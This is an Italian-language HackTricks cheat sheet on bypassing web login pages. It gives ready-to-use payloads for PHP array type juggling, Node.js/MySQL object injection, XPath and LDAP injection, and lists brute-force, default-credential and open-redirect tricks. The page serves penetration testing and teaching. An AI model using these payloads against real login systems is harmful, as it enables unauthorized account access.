Login Bypass
Reading time: 4 minutes
tip
Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.
Bypass del login regolare
Se trovi una pagina di login, qui puoi trovare alcune tecniche per provare a bypassarla:
- Controlla i commenti all'interno della pagina (scorri verso il basso e a destra?)
- Controlla se puoi accedere direttamente alle pagine riservate
- Controlla di non inviare i parametri (non inviare nulla o solo 1)
- Controlla l'errore di confronto PHP:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- Cambia il tipo di contenuto in json e invia valori json (incluso bool true)
- Se ricevi una risposta che dice che il POST non è supportato, puoi provare a inviare il JSON nel corpo ma con una richiesta GET con
Content-Type: application/json
- Controlla l'eventuale errore di parsing di nodejs (leggi questo):
password[password]=1
- Nodejs trasformerà quel payload in una query simile alla seguente:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
il che rende il bit della password sempre vero. - Se puoi inviare un oggetto JSON puoi inviare
"password":{"password": 1}
per bypassare il login. - Ricorda che per bypassare questo login devi comunque conoscere e inviare un nome utente valido.
- Aggiungere l'opzione
"stringifyObjects":true
quando chiamimysql.createConnection
bloccherà eventualmente tutti i comportamenti imprevisti quandoObject
viene passato come parametro. - Controlla le credenziali:
- Credenziali predefinite della tecnologia/piattaforma utilizzata
- Combinazioni comuni (root, admin, password, nome della tecnologia, utente predefinito con una di queste password).
- Crea un dizionario usando Cewl, aggiungi il nome utente e la password predefiniti (se ci sono) e prova a fare brute-force usando tutte le parole come nomi utente e password
- Brute-force usando un dizionario più grande (Brute force)
Bypass di autenticazione SQL Injection
Qui puoi trovare diversi trucchi per bypassare il login tramite SQL injections.
Nella pagina seguente puoi trovare un elenco personalizzato per provare a bypassare il login tramite SQL Injections:
Bypass di autenticazione No SQL Injection
Qui puoi trovare diversi trucchi per bypassare il login tramite No SQL Injections.
Poiché le NoSQL Injections richiedono di modificare il valore dei parametri, dovrai testarle manualmente.
Bypass di autenticazione XPath Injection
Qui puoi trovare diversi trucchi per bypassare il login tramite XPath Injection.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
Bypass dell'autenticazione LDAP Injection
Qui puoi trovare diversi trucchi per bypassare il login tramite LDAP Injection.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Ricordami
Se la pagina ha la funzionalità "Ricordami", controlla come è implementata e verifica se puoi abusarne per prendere il controllo di altri account.
Redirect
Le pagine di solito reindirizzano gli utenti dopo il login, controlla se puoi alterare quel reindirizzamento per causare un Open Redirect. Forse puoi rubare alcune informazioni (codici, cookie...) se reindirizzi l'utente al tuo sito web.
Altri Controlli
- Controlla se puoi enumerare i nomi utente abusando della funzionalità di login.
- Controlla se l'auto-completamento è attivo nei moduli di password/informazioni sensibili input:
<input autocomplete="false">
Strumenti Automatici
tip
Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.